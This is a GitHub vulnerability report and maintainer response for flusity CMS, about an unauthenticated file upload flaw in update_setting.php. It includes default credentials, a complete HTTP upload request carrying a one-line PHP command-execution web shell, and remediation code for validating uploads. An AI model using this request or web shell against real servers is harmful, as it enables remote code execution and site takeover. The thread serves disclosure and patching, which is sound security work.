flusity / flusity-CMS

MIT License

Unauthenticated Unrestricted Upload of File with Dangerous Type in update_setting.php #9

Closed BaciHanma closed 9 months ago

BaciHanma commented 9 months ago

After installation, log in to the backend using the default account/password tester/1234. Select core settings -> Settings. Select upload file. Intercept the traffic, modify the filename to a PHP file name suffix, and change the content to PHP code.

POST /core/tools/actions/update_setting.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------179823897913899829053591720907
Content-Length: 1866
Origin: http://localhost
Connection: close
Referer: http://localhost/core/tools/settings.php
Cookie: PHPSESSID=drc2752h4lmmrqc9vvu5qio597
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="site_title"

Free CMS flusity
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="meta_description"

Flusity is a contemporary PHP CMS project utilizing MVC architecture, MySQL database, and Bootstrap front-end framework. It includes the management of users, posts, menu, blocks and other elements, as well as security and SEO featurD
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="default_keywords"

free cms, php, free website, cms, content management system, free cms flusity, php cms, website 
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="footer_text"

Copyright © flusity JD Theme 2023
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="pretty_url"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="registration_enabled"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="posts_per_page"

10
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="language"

en
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="bilingualism"

1
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="session_lifetime"

30
-----------------------------179823897913899829053591720907
Content-Disposition: form-data; name="brand_icone"; filename="index.php"
Content-Type: image/png

<?php echo system($_GET['command']); ?>
-----------------------------179823897913899829053591720907--

You can upload without authentication:

View the uploaded files. The PHP code executes correctly. On line 52 of update_setting.php: it is not enough to filter file_types and file_size; you need to filter file_name and file_extensions.

flusity commented 9 months ago

After noticing a security hole in the file upload functionality, I thoroughly reviewed and updated the code to ensure a higher level of system security. Here are the main actions and changes made:

Changes and their purpose:

Checking allowed file extensions: I added an additional check for file extensions in addition to the already existing MIME type check. This ensures that only allowed image file formats (e.g. .png, .jpeg, .gif) are accepted. This step helps prevent malicious scripts from being loaded by bypassing file type checking.

Filename Security Assurance: I modified the filename generation logic to use only safe characters and a unique code, along with lowercase letters for the file extension. This helps prevent potential attacks that could be performed by manipulating file names.

Double Check File Type: I implemented both MIME type and file extension checking to double check that the uploaded file is indeed of an allowed type. This additional layer of security reduces the risk of restrictions being bypassed during the upload process.

Code Optimization and Duplication Removal: I removed unnecessary code duplication related to file inclusion (require_once) to reduce the chance of errors and improve code maintainability.

Security Measures Results: These changes not only prevent malicious files from being uploaded to the system, but also increase the overall resistance of the application against various security threats. The file upload feature now carefully checks and validates each uploaded file, ensuring that only verified and safe files are accepted.

In addition, these updates improve system security by reducing the potential risk of malicious code execution and ensuring that the file upload process is controlled and secure. Thanks for the comments.
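The three checks the maintainer describes above (extension allowlist, server-side MIME check, generated safe filename), written out as an added example for the `brand_icone` field of update_setting.php; this is not flusity's own code, and the function names and the upload directory path are assumptions.

```php
<?php
// Added example, not flusity's own code: server-side validation for the
// "brand_icone" upload of update_setting.php, applying the checks the
// maintainer lists (extension allowlist, server-detected MIME type, generated
// safe filename). Function names and $uploadDir are assumptions.

function validate_image_upload(array $file, int $maxBytes = 2097152): string
{
    // PHP's own upload status comes first; anything but UPLOAD_ERR_OK is rejected.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Invalid upload');
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('File too large');
    }

    // 1. Extension allowlist: lowercase the client-supplied extension and require
    //    it to be one of a fixed set. "index.php" from the report fails here.
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                'jpeg' => 'image/jpeg', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('Extension not allowed: ' . $ext);
    }

    // 2. MIME type sniffed from the file bytes on the server. The client's
    //    Content-Type header (image/png in the report) is never consulted, and
    //    the detected type must agree with the extension.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== $allowed[$ext]) {
        throw new RuntimeException("Detected type $detected does not match .$ext");
    }

    // 3. Discard the client filename entirely: a random hex name plus the
    //    validated lowercase extension, so no path or name manipulation survives.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function store_brand_icon(array $file, string $uploadDir): string
{
    $dest = rtrim($uploadDir, '/') . '/' . validate_image_upload($file);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    return $dest;
}

// In update_setting.php (upload directory path is assumed):
// $stored = store_brand_icon($_FILES['brand_icone'], __DIR__ . '/../../uploads');
```

The report also shows the request succeeding without a session ("You can upload without authentication"), which file validation alone does not address; the handler still needs its own authentication check before any of the above runs.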